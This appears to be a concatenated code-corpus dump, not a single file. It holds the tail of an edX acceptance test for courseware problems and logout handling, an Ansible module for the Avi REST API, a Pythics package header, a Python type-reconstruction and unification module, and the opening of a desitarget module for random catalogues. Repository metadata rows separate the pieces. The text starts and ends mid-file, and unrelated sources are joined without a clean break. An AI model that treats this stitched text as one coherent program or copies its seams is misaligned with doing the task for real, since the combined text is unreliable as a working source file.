return XBlockFixtureDesc('problem', 'PARTIAL CREDIT TEST PROBLEM', data=xml)
def test_partial_credit(self):
"""
Test that we can see the partial credit value and feedback.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'PARTIAL CREDIT TEST PROBLEM')
problem_page.fill_answer_numerical('-1')
problem_page.click_submit()
problem_page.wait_for_status_icon()
self.assertTrue(problem_page.simpleprob_is_partially_correct())
class LogoutDuringAnswering(ProblemsTest):
"""
Tests for the scenario where a user is logged out (their session expires
or is revoked) just before they click "check" on a problem.
"""
def get_problem(self):
"""
Create a problem.
"""
xml = dedent("""
<problem>
<numericalresponse answer="1">
<label>The answer is 1</label>
<formulaequationinput/>
<responseparam type="tolerance" default="0.01" />
</numericalresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml)
def log_user_out(self):
"""
Log the user out by deleting their session cookie.
"""
self.browser.delete_cookie('sessionid')
def test_logout_after_click_redirect(self):
"""
1) User goes to a problem page.
2) User fills out an answer to the problem.
3) User is logged out because their session id is invalidated or removed.
4) User clicks "check", and sees a confirmation modal asking them to
re-authenticate, since they've just been logged out.
5) User clicks "ok".
6) User is redirected to the login page.
7) User logs in.
8) User is redirected back to the problem page they started out on.
9) User is able to submit an answer
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
problem_page.fill_answer_numerical('1')
self.log_user_out()
with problem_page.handle_alert(confirm=True):
problem_page.click_submit()
login_page = CombinedLoginAndRegisterPage(self.browser)
login_page.wait_for_page()
login_page.login(self.email, self.password)
problem_page.wait_for_page()
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
problem_page.fill_answer_numerical('1')
problem_page.click_submit()
self.assertTrue(problem_page.simpleprob_is_correct())
def test_logout_cancel_no_redirect(self):
"""
1) User goes to a problem page.
2) User fills out an answer to the problem.
3) User is logged out because their session id is invalidated or removed.
4) User clicks "check", and sees a confirmation modal asking them to
re-authenticate, since they've just been logged out.
5) User clicks "cancel".
6) User is not redirected to the login page.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
problem_page.fill_answer_numerical('1')
self.log_user_out()
with problem_page.handle_alert(confirm=False):
problem_page.click_submit()
problem_page.wait_for_page()
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
class ProblemQuestionDescriptionTest(ProblemsTest):
"""TestCase Class to verify question and description rendering."""
descriptions = [
"A vegetable is an edible part of a plant in tuber form.",
"A fruit is a fertilized ovary of a plant and contains seeds."
]
def get_problem(self):
"""
Create a problem with question and description.
"""
xml = dedent("""
<problem>
<choiceresponse>
<label>Eggplant is a _____?</label>
<description>{}</description>
<description>{}</description>
<checkboxgroup>
<choice correct="true">vegetable</choice>
<choice correct="false">fruit</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""".format(*self.descriptions))
return XBlockFixtureDesc('problem', 'Label with Description', data=xml)
def test_question_with_description(self):
"""
Scenario: Test that question and description are rendered as expected.
Given I am enrolled in a course.
When I visit a unit page with a CAPA question.
Then label and description should be rendered correctly.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'Label with Description')
self.assertEqual(problem_page.problem_question, 'Eggplant is a _____?')
self.assertEqual(problem_page.problem_question_descriptions, self.descriptions)
class CAPAProblemA11yBaseTestMixin(object):
"""Base TestCase Class to verify CAPA problem accessibility."""
def test_a11y(self):
"""
Verifies that there are no accessibility issues for a particular problem type
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# Set the scope to the problem question
problem_page.a11y_audit.config.set_scope(
include=['.wrapper-problem-response']
)
# Run the accessibility audit.
problem_page.a11y_audit.check_for_accessibility_errors()
@attr('a11y')
class CAPAProblemChoiceA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""TestCase Class to verify accessibility for checkboxes and multiplechoice CAPA problems."""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<choiceresponse>
<label>question 1 text here</label>
<description>description 2 text 1</description>
<description>description 2 text 2</description>
<checkboxgroup>
<choice correct="true">True</choice>
<choice correct="false">False</choice>
</checkboxgroup>
</choiceresponse>
<multiplechoiceresponse>
<label>question 2 text here</label>
<description>description 2 text 1</description>
<description>description 2 text 2</description>
<choicegroup type="MultipleChoice">
<choice correct="false">Alpha <choicehint>A hint</choicehint></choice>
<choice correct="true">Beta</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'Problem A11Y TEST', data=xml)
@attr('a11y')
class ProblemTextInputA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""TestCase Class to verify TextInput problem accessibility."""
def get_problem(self):
"""
TextInput problem XML.
"""
xml = dedent("""
<problem>
<stringresponse answer="fight" type="ci">
<label>who wishes to _____ must first count the cost.</label>
<description>Appear weak when you are strong, and strong when you are weak.</description>
<description>In the midst of chaos, there is also opportunity.</description>
<textline size="40"/>
</stringresponse>
<stringresponse answer="force" type="ci">
<label>A leader leads by example not by _____.</label>
<description>The supreme art of war is to subdue the enemy without fighting.</description>
<description>Great results, can be achieved with small forces.</description>
<textline size="40"/>
</stringresponse>
</problem>""")
return XBlockFixtureDesc('problem', 'TEXTINPUT PROBLEM', data=xml)
@attr('a11y')
class CAPAProblemDropDownA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""TestCase Class to verify accessibility for dropdowns(optioninput) CAPA problems."""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<optionresponse>
<p>You can use this template as a guide to the simple editor markdown and OLX markup to use for
dropdown problems. Edit this component to replace this template with your own assessment.</p>
                    <label>Which of the following is a fruit?</label>
<description>Choose wisely</description>
<optioninput>
<option correct="False">radish</option>
<option correct="True">appple</option>
<option correct="False">carrot</option>
</optioninput>
</optionresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'Problem A11Y TEST', data=xml)
@attr('a11y')
class ProblemNumericalInputA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""Tests NumericalInput accessibility."""
def get_problem(self):
"""NumericalInput problem XML."""
xml = dedent("""
<problem>
<numericalresponse answer="10*i">
<label>The square of what number is -100?</label>
<description>Use scientific notation to answer.</description>
<formulaequationinput/>
</numericalresponse>
</problem>""")
return XBlockFixtureDesc('problem', 'NUMERICALINPUT PROBLEM', data=xml)
@attr('a11y')
class ProblemMathExpressionInputA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""Tests MathExpressionInput accessibility."""
def get_problem(self):
"""MathExpressionInput problem XML."""
xml = dedent(r"""
<problem>
<script type="loncapa/python">
derivative = "n*x^(n-1)"
</script>
<formularesponse type="ci" samples="x,n@1,2:3,4#10" answer="$derivative">
<label>Let \( x\) be a variable, and let \( n\) be an arbitrary constant. What is the derivative of \( x^n\)?</label>
<description>Enter the equation</description>
<responseparam type="tolerance" default="0.00001"/>
<formulaequationinput size="40"/>
</formularesponse>
</problem>""")
return XBlockFixtureDesc('problem', 'MATHEXPRESSIONINPUT PROBLEM', data=xml)
class ProblemMetaGradedTest(ProblemsTest):
"""
TestCase Class to verify that the graded variable is passed
"""
def get_problem(self):
"""
Problem structure
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml, grader_type='Final Exam')
def test_grader_type_displayed(self):
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
self.assertEqual(problem_page.problem_progress_graded_value, "1 point possible (graded)")
class ProblemMetaUngradedTest(ProblemsTest):
"""
TestCase Class to verify that the ungraded variable is passed
"""
def get_problem(self):
"""
Problem structure
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml)
def test_grader_type_displayed(self):
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
self.assertEqual(problem_page.problem_progress_graded_value, "1 point possible (ungraded)")
|
jzoldak/edx-platform
|
common/test/acceptance/tests/lms/test_lms_problems.py
|
Python
|
agpl-3.0
| 37,565
|
[
"VisIt"
] |
641cc740c096d2e233807a8053b60560d33cde80f7b3fa90caa9c7a06a01bd9e
|
#!/usr/bin/python
"""
# Created on Aug 12, 2016
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com) GitHub ID: grastogi23
#
# module_check: not supported
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
"""
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_api_session
author: Gaurav Rastogi (@grastogi23) <grastogi@avinetworks.com>
short_description: Avi API Module
description:
- This module can be used for calling any resources defined in Avi REST API. U(https://avinetworks.com/)
    - This module is useful for invoking HTTP Patch methods and accessing resources that do not have a REST object associated with them.
version_added: 2.3
requirements: [ avisdk ]
options:
http_method:
description:
            - Allowed HTTP methods for RESTful services, as supported by the Avi Controller.
choices: ["get", "put", "post", "patch", "delete"]
required: true
data:
description:
- HTTP body in YAML or JSON format.
params:
description:
- Query parameters passed to the HTTP API.
path:
description:
            - 'Path for Avi API resource. For example, C(path: virtualservice) will translate to C(api/virtualservice).'
timeout:
description:
- Timeout (in seconds) for Avi API calls.
default: 60
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Get Pool Information using avi_api_session
avi_api_session:
controller: "{{ controller }}"
username: "{{ username }}"
password: "{{ password }}"
http_method: get
path: pool
params:
name: "{{ pool_name }}"
api_version: 16.4
register: pool_results
- name: Patch Pool with list of servers
avi_api_session:
controller: "{{ controller }}"
username: "{{ username }}"
password: "{{ password }}"
http_method: patch
path: "{{ pool_path }}"
api_version: 16.4
data:
add:
servers:
- ip:
addr: 10.10.10.10
type: V4
- ip:
addr: 20.20.20.20
type: V4
register: updated_pool
- name: Fetch Pool metrics bandwidth and connections rate
avi_api_session:
controller: "{{ controller }}"
username: "{{ username }}"
password: "{{ password }}"
http_method: get
path: analytics/metrics/pool
api_version: 16.4
params:
name: "{{ pool_name }}"
metric_id: l4_server.avg_bandwidth,l4_server.avg_complete_conns
step: 300
limit: 10
register: pool_metrics
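# An illustrative sketch (not one of the module's original examples):
# delete an object via its full API path; pool_uuid is assumed to be
# registered elsewhere in the play.
- name: Delete a Pool by full path
  avi_api_session:
    controller: "{{ controller }}"
    username: "{{ username }}"
    password: "{{ password }}"
    http_method: delete
    path: "pool/{{ pool_uuid }}"
    api_version: 16.4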
'''
RETURN = '''
obj:
description: Avi REST resource
returned: success, changed
type: dict
'''
import json
import time
from ansible.module_utils.basic import AnsibleModule
from copy import deepcopy
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, ansible_return, avi_obj_cmp,
cleanup_absent_fields, HAS_AVI)
from ansible.module_utils.network.avi.avi_api import (
ApiSession, AviCredentials)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
http_method=dict(required=True,
choices=['get', 'put', 'post', 'patch',
'delete']),
path=dict(type='str', required=True),
params=dict(type='dict'),
data=dict(type='jsonarg'),
timeout=dict(type='int', default=60)
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(argument_spec=argument_specs)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) or requests is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
api_creds = AviCredentials()
api_creds.update_from_ansible_module(module)
api = ApiSession.get_session(
api_creds.controller, api_creds.username, password=api_creds.password,
timeout=api_creds.timeout, tenant=api_creds.tenant,
tenant_uuid=api_creds.tenant_uuid, token=api_creds.token,
port=api_creds.port)
tenant_uuid = api_creds.tenant_uuid
tenant = api_creds.tenant
timeout = int(module.params.get('timeout'))
# path is a required argument
path = module.params.get('path', '')
params = module.params.get('params', None)
data = module.params.get('data', None)
# Get the api_version from module.
api_version = api_creds.api_version
if data is not None:
data = json.loads(data)
method = module.params['http_method']
existing_obj = None
changed = method != 'get'
gparams = deepcopy(params) if params else {}
gparams.update({'include_refs': '', 'include_name': ''})
# API methods not allowed
api_get_not_allowed = ["cluster", "gslbsiteops"]
api_post_not_allowed = ["alert", "fileservice"]
api_put_not_allowed = ["backup"]
if method == 'post' and not any(path.startswith(uri) for uri in api_post_not_allowed):
# TODO: Above condition should be updated after AV-38981 is fixed
# need to check if object already exists. In that case
# change the method to be put
try:
using_collection = False
if not any(path.startswith(uri) for uri in api_get_not_allowed):
if 'name' in data:
gparams['name'] = data['name']
using_collection = True
if not any(path.startswith(uri) for uri in api_get_not_allowed):
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
existing_obj = rsp.json()
if using_collection:
existing_obj = existing_obj['results'][0]
except (IndexError, KeyError):
# object is not found
pass
else:
if not any(path.startswith(uri) for uri in api_get_not_allowed):
# object is present
method = 'put'
path += '/' + existing_obj['uuid']
if method == 'put' and not any(path.startswith(uri) for uri in api_put_not_allowed):
        # put can happen when the full path is specified, or it is put + post
if existing_obj is None:
using_collection = False
if ((len(path.split('/')) == 1) and ('name' in data) and
(not any(path.startswith(uri) for uri in api_get_not_allowed))):
gparams['name'] = data['name']
using_collection = True
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
rsp_data = rsp.json()
if using_collection:
if rsp_data['results']:
existing_obj = rsp_data['results'][0]
path += '/' + existing_obj['uuid']
else:
method = 'post'
else:
if rsp.status_code == 404:
method = 'post'
else:
existing_obj = rsp_data
if existing_obj:
changed = not avi_obj_cmp(data, existing_obj)
cleanup_absent_fields(data)
if method == 'patch':
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
existing_obj = rsp.json()
if (method == 'put' and changed) or (method != 'put'):
fn = getattr(api, method)
        rsp = fn(path, tenant=tenant, tenant_uuid=tenant_uuid, timeout=timeout,
                 params=params, data=data, api_version=api_version)
else:
rsp = None
if method == 'delete' and rsp.status_code == 404:
changed = False
rsp.status_code = 200
if method == 'patch' and existing_obj and rsp.status_code < 299:
# Ideally the comparison should happen with the return values
# from the patch API call. However, currently Avi API are
# returning different hostname when GET is used vs Patch.
# tracked as AV-12561
if path.startswith('pool'):
time.sleep(1)
gparams = deepcopy(params) if params else {}
gparams.update({'include_refs': '', 'include_name': ''})
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
new_obj = rsp.json()
changed = not avi_obj_cmp(new_obj, existing_obj)
if rsp is None:
return module.exit_json(changed=changed, obj=existing_obj)
return ansible_return(module, rsp, changed, req=data)
if __name__ == '__main__':
main()
|
thaim/ansible
|
lib/ansible/modules/network/avi/avi_api_session.py
|
Python
|
mit
| 9,021
|
[
"VisIt"
] |
79f3cb7f5577b5072180d7df821f6073abbf9bf990093eade8a3b838489c4c3e
|
# -*- coding: utf-8 -*-
#
# Copyright 2008 - 2019 Brian R. D'Urso
#
# This file is part of Python Instrument Control System, also known as Pythics.
#
# Pythics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pythics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pythics. If not, see <http://www.gnu.org/licenses/>.
#
__all__ = ['lib']
|
dursobr/Pythics
|
pythics/__init__.py
|
Python
|
gpl-3.0
| 802
|
[
"Brian"
] |
cebca798a813b39dbb1096e1f6aeb998f64106a0f74b588e1ed13e8b6eff5edd
|
from functools import reduce
from syntax import *
from collections import namedtuple
class NoRuleApplies(RuntimeError):
pass
# ------------------------ EVALUATION ------------------------
def isnumericval(term):
t_term = type(term)
if t_term is TmZero:
return True
elif t_term is TmSucc:
return isnumericval(term.term)
return False
def isval(term):
t_term = type(term)
if t_term is TmTrue:
return True
elif t_term is TmFalse:
return True
elif isnumericval(term):
return True
elif t_term is TmAbs:
return True
return False
class Evaluate(Visitor):
def visit_TmApp(term, ctx):
if isval(term.left) and isval(term.right):
return termSubstTop(term.right, term.left.term)
elif isval(term.left):
right = evaluate1(term.right, ctx)
return term._replace(right=right)
else:
left = evaluate1(term.left, ctx)
return term._replace(left=left)
def visit_TmIf(term, ctx):
t_cond = type(term.term_condition)
if t_cond is TmTrue:
return term.term_then
elif t_cond is TmFalse:
return term.term_else
t = evaluate1(term.term_condition, ctx)
return term._replace(term_condition=t)
def visit_TmSucc(term, ctx):
t = evaluate1(term.term, ctx)
return term._replace(term=t)
def visit_TmPred(term, ctx):
t_term = type(term.term)
if t_term is TmZero:
return TmZero(None)
elif t_term is TmSucc and isnumericval(term.term):
            # E-PredSucc: pred (succ nv) -> nv
            return term.term.term
t = evaluate1(term.term, ctx)
return TmPred(term.info, t)
def visit_TmIsZero(term, ctx):
t_term = type(term.term)
if t_term is TmZero:
return TmTrue(None)
elif t_term is TmSucc and isnumericval(term.term):
return TmFalse(None)
t = evaluate1(term.term, ctx)
return TmIsZero(term.info, t)
def visit_ANY(term, ctx):
raise NoRuleApplies
evaluate1 = Evaluate.visit
def evaluate(ctx, term):
try:
return evaluate(ctx, evaluate1(term, ctx))
except NoRuleApplies:
return term
# ------------------------ TYPING ------------------------
combineconstr = list.extend
def uvargen():
n = 0
while True:
yield "?X%s" % n
n += 1
class Reconstruction(Visitor):
def visit_TmVar(term, ctx, nextuvar):
tyT = getTypeFromContext(ctx, term.index)
return (tyT, [])
def visit_TmAbs(term, ctx, nextuvar):
"lambda <name>:<type>. <term>"
typeLeft = term.type
addbinding(ctx, term.name, VarBind(typeLeft))
(typeRight, contsr) = recon(term.term, ctx, nextuvar)
ctx.pop()
return (TyArr(typeLeft, typeRight), contsr)
def visit_TmApp(term, ctx, nextuvar):
"""
(t1 t2) with t1: T1, t2: T2
return: type X and constraint T1 = T2 -> X
see 22.3 Constraint-Based Typing
"""
(typeLeft, constrLeft) = recon(term.left, ctx, nextuvar)
(typeRight, constrRight) = recon(term.right, ctx, nextuvar)
tyX = nextuvar()
        # typeLeft should be an 'arrow' from typeRight to X
newconstr = [(typeLeft, TyArr(typeRight, TyId(tyX)))]
constr = newconstr + constrLeft + constrRight
return (TyId(tyX), constr)
def visit_TmZero(term, ctx, nextuvar):
return (TyNat(), [])
def visit_TmSucc(term, ctx, nextuvar):
(tyT, constr) = recon(term.term, ctx, nextuvar)
return (TyNat(), [(tyT, TyNat())] + constr)
def visit_TmPred(term, ctx, nextuvar):
(tyT, constr) = recon(term.term, ctx, nextuvar)
return (TyNat(), [(tyT, TyNat())] + constr)
def visit_TmIsZero(term, ctx, nextuvar):
(tyT, constr) = recon(term.term, ctx, nextuvar)
        # iszero has type Bool, under the constraint that its argument is a Nat
        return (TyBool(), [(tyT, TyNat())] + constr)
def visit_TmTrue(term, ctx, nextuvar):
return (TyBool(), [])
def visit_TmFalse(term, ctx, nextuvar):
return (TyBool(), [])
def visit_TmIf(term, ctx, nextuvar):
(tyT1, constr1) = recon(term.term_condition, ctx, nextuvar)
(tyT2, constr2) = recon(term.term_then, ctx, nextuvar)
(tyT3, constr3) = recon(term.term_else, ctx, nextuvar)
newconstr = [(tyT1,TyBool()), (tyT2,tyT3)]
constr = newconstr + constr1 + constr2 + constr3
return (tyT3, constr)
recon = Reconstruction.visit
class SubstituteInTy(Visitor):
def visit_TyArr(term, tyX, tyT):
return TyArr(
substinty(term.left, tyX, tyT),
substinty(term.right, tyX, tyT))
def visit_TyNat(term, tyX, tyT):
return term
def visit_TyBool(term, tyX, tyT):
return term
def visit_TyId(term, tyX, tyT):
if term.name == tyX:
return tyT
return term
substinty = SubstituteInTy.visit
def applysubst(constr, tyT):
tyS = tyT
for (tyC1, tyC2) in reversed(constr):
tyX = tyC1.name
tyS = substinty(tyS, tyX, tyC2)
return tyS
def substinconstr(tyT, tyX, constr):
return list(map(
lambda tyS: (
substinty(tyS[0], tyX, tyT),
substinty(tyS[1], tyX, tyT)),
constr))
class OccursIn(Visitor):
def visit_TyArr(term, tyX):
return (
occursin(term.left, tyX)
or occursin(term.right, tyX))
def visit_TyNat(term, tyX):
return False
def visit_TyBool(term, tyX):
return False
def visit_TyId(term, tyX):
return term.name == tyX
occursin = OccursIn.visit
def unify(ctx, constr_in):
if not constr_in:
return constr_in
constr = list(constr_in)
(tyS, tyT) = constr[0]
rest = constr[1:]
t_tyS = type(tyS)
t_tyT = type(tyT)
if t_tyT is TyId:
tyX = tyT.name
if tyS == tyT:
return unify(ctx, rest)
elif occursin(tyS, tyX):
raise RuntimeError("Circular constraints")
else:
upd = unify(ctx, substinconstr(tyS, tyX, rest))
upd.append((TyId(tyX),tyS))
return upd
elif t_tyS is TyId:
tyX = tyS.name
if tyT == tyS:
return unify(ctx, rest)
elif occursin(tyT, tyX):
raise RuntimeError("Circular constraints")
else:
upd = unify(ctx, substinconstr(tyT, tyX, rest))
upd.append((TyId(tyX),tyT))
return upd
elif t_tyS is TyNat and t_tyT is TyNat:
return unify(ctx, rest)
elif t_tyS is TyBool and t_tyT is TyBool:
return unify(ctx, rest)
elif t_tyS is TyArr and t_tyT is TyArr:
upd = [(tyS.left, tyT.left), (tyS.right, tyT.right)]
upd.extend(rest)
return unify(ctx, upd)
raise RuntimeError("Unsolvable constraints")
|
habibutsu/tapl-py
|
recon/core.py
|
Python
|
mit
| 6,891
|
[
"VisIt"
] |
c46e7ac60bc4b20aa4197186291b6d5a52df2f6bd5a423b860c319df7853797f
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""
desitarget.randoms
==================
Monte Carlo Legacy Surveys imaging at the pixel level to model the imaging footprint
"""
import os
import numpy as np
import astropy.io.fits as fits
from astropy.wcs import WCS
from time import time
import healpy as hp
import fitsio
import photutils
from glob import glob, iglob
from desitarget.gaiamatch import get_gaia_dir
from desitarget.geomask import bundle_bricks, box_area
from desitarget.geomask import get_imaging_maskbits, get_default_maskbits
from desitarget.targets import resolve, main_cmx_or_sv, finalize
from desitarget.skyfibers import get_brick_info
from desitarget.io import read_targets_in_box, target_columns_from_header
from desitarget.targetmask import desi_mask as dMx
# ADM the parallelization script.
from desitarget.internal import sharedmem
# ADM set up the DESI default logger.
from desiutil import brick
from desiutil.log import get_logger
# ADM a look-up dictionary that converts priorities to bit-names.
bitperprio = {dMx[bn].priorities["UNOBS"]: dMx[bn] for bn in dMx.names()
if len(dMx[bn].priorities) > 0}
# ADM set up the Legacy Surveys bricks objects.
bricks = brick.Bricks(bricksize=0.25)
# ADM make a BRICKNAME->BRICKID look-up table for speed.
bricktable = bricks.to_table()
bricklookup = {bt["BRICKNAME"]: bt["BRICKID"] for bt in bricktable}
# ADM set up the default logger from desiutil.
log = get_logger()
# ADM start the clock.
start = time()
def dr_extension(drdir):
"""Extension information for files in a Legacy Survey coadd directory
Parameters
----------
drdir : :class:`str`
The root directory for a Data Release from the Legacy Surveys
e.g. /global/project/projectdirs/cosmo/data/legacysurvey/dr7.
Returns
-------
:class:`str`
Whether the file extension is 'gz' or 'fz'.
:class:`int`
Corresponding FITS extension number to be read (0 or 1).
Notes
-----
- If the directory structure seems wrong or can't be found then
the post-DR4 convention (.fz files) is returned.
"""
try:
# ADM a generator of all of the nexp files in the coadd directory.
gen = iglob(drdir+"/coadd/*/*/*nexp*")
# ADM pop the first file in the generator.
anexpfile = next(gen)
extn = anexpfile[-2:]
if extn == 'gz':
return 'gz', 0
# ADM this is triggered if the generator is empty.
except StopIteration:
msg = "couldn't find any nexp files in {}...".format(
os.path.join(drdir, "coadd"))
msg += "Defaulting to '.fz' extensions for Legacy Surveys coadd files"
log.info(msg)
return 'fz', 1
def finalize_randoms(randoms):
"""Add the standard "final" columns that are also added in targeting.
Parameters
----------
randoms : :class:`~numpy.ndarray`
        A random catalog as made by, e.g., :func:`select_randoms()`
        with `nomtl=True` or `select_randoms_bricks()` with
        `nomtl=False`. This function then adds the final targeting columns.
Returns
-------
:class:`~numpy.array`
The random catalog after the "final" targeting columns (such as
"DESI_TARGET", etc.) have been added.
Notes
-----
- Typically used in conjunction with :func:`add_default_mtl()`
"""
# ADM make every random the highest-priority target.
dt = np.zeros_like(randoms["RA"]) + bitperprio[np.max(list(bitperprio))]
return finalize(randoms, dt, dt*0, dt*0, randoms=True)
def rewrite_randoms_in_hp(fn, outdn, nside, verbose=True, ntest=None):
"""Rewrite randoms in HEALPixels, in files that can use io functions.
Parameters
----------
fn : :class:`str`
The filename of a monolithic random catalog to be rewritten split
across HEALPixels. For full functionality, include the entire
directory string to be searched for the data release number.
outdn : :class:`str`
Output directory to which to write the files. The sub-directory
structure and filenames are built on-the-fly from the header of
`fn` (which must correspond to a typical random catalog).
nside : :class:`int`
The NESTED HEALPixel resolution at which to write files.
verbose : :class:`bool`, optional, defaults to ``True``
If ``True`` then log extra information.
ntest : :class:`int`, optional, default to ``None``
If passed (and not ``None``) then read the first `ntest` randoms
instead of the entire catalog. Useful for testing.
Returns
-------
Nothing, but rewrites the randoms in `fn` split across HEALPixels.
Notes
-----
- Really just a simple wrapper on :func:`io.write_randoms_in_hp()`
that also reads the input file.
"""
t0 = time()
from desitarget.io import write_randoms_in_hp
# ADM read in the random catalog (and header).
if ntest is None:
randoms, hdr = fitsio.read(fn, header=True)
else:
randoms, hdr = fitsio.read(fn, header=True, rows=np.arange(ntest))
if verbose:
log.info('Read {} randoms from {}...t={:.1f}m'
.format(len(randoms), fn, (time()-t0)/60.))
# ADM determine all possible pixels at the passed nside.
pixlist = np.arange(hp.nside2npix(nside))
# ADM write the catalog back out split-by-healpixel
_, _ = write_randoms_in_hp(randoms, outdn, nside, pixlist,
verbose=verbose, infile=fn, hdr=hdr)
if verbose:
log.info('Done...t={:.1f}m'.format((time()-t0)/60.))
return
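# A hedged usage sketch for the wrapper above (the filenames are
# illustrative, not real):
#     rewrite_randoms_in_hp("randoms-inside-dr9.fits", "randoms-hp",
#                           nside=8, ntest=10000)
# reads the first 10,000 rows of the monolithic catalog and rewrites
# them into one file per nside=8 NESTED HEALPixel under "randoms-hp".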
def add_default_mtl(randoms, seed):
"""Add default columns that are added by MTL.
Parameters
----------
randoms : :class:`~numpy.ndarray`
A random catalog as made by, e.g., :func:`select_randoms()`
with `nomtl=True` or `select_randoms_bricks()` with
`nomtl=False`. This function adds the default MTL information.
seed : :class:`int`
A seed for the random generator that sets the `SUBPRIORITY`.
Returns
-------
:class:`~numpy.array`
The random catalog after being passed through MTL.
Notes
-----
- Typically you will need to run :func:`finalize_randoms()`
first, to populate the columns for the target bits.
"""
from desitarget.mtl import make_mtl
randoms = np.array(make_mtl(randoms, obscon="DARK"))
# ADM add OBCONDITIONS that will work for any obscon.
from desitarget.targetmask import obsconditions as obscon
randoms["OBSCONDITIONS"] = obscon.mask("|".join(obscon.names()))
# ADM add a random SUBPRIORITY.
np.random.seed(616+seed)
nrands = len(randoms)
randoms["SUBPRIORITY"] = np.random.random(nrands)
return randoms
def randoms_in_a_brick_from_edges(ramin, ramax, decmin, decmax, density=100000,
poisson=True, wrap=True, seed=1):
"""For brick edges, return random (RA/Dec) positions in the brick.
Parameters
----------
ramin : :class:`float`
The minimum "edge" of the brick in Right Ascension (degrees).
ramax : :class:`float`
The maximum "edge" of the brick in Right Ascension (degrees).
decmin : :class:`float`
The minimum "edge" of the brick in Declination (degrees).
decmax : :class:`float`
The maximum "edge" of the brick in Declination (degrees).
density : :class:`int`, optional, defaults to 100,000
The number of random points to return per sq. deg.
poisson : :class:`boolean`, optional, defaults to ``True``
Modify the number of random points so that instead of simply
being brick area x density, the number is drawn from a Poisson
distribution with an expectation of brick area x density.
wrap : :class:`boolean`, optional, defaults to ``True``
If ``True``, bricks with `ramax`-`ramin` > 350o are assumed to
wrap, which is corrected by subtracting 360o from `ramax`, as is
        reasonable for small bricks. ``False`` turns off this correction.
seed : :class:`int`, optional, defaults to 1
Random seed to use when shuffling across brick boundaries.
The actual np.random.seed defaults to::
seed*int(1e7)+int(4*ramin)*1000+int(4*(decmin+90))
Returns
-------
:class:`~numpy.array`
Right Ascensions of random points in brick (degrees).
:class:`~numpy.array`
Declinations of random points in brick (degrees).
"""
# ADM create a unique random seed on the basis of the brick.
# ADM note this is only unique for bricksize=0.25 for bricks
# ADM that are more than 0.25 degrees from the poles.
uniqseed = seed*int(1e7)+int(4*ramin)*1000+int(4*(decmin+90))
# ADM np.random only allows seeds < 2**32...
maxseed = (2**32-int(4*ramin)*1000-int(4*(decmin+90)))/1e7
if seed > maxseed:
msg = 'seed must be < {} but you passed {}!!!'.format(maxseed, seed)
log.critical(msg)
raise ValueError(msg)
np.random.seed(uniqseed)
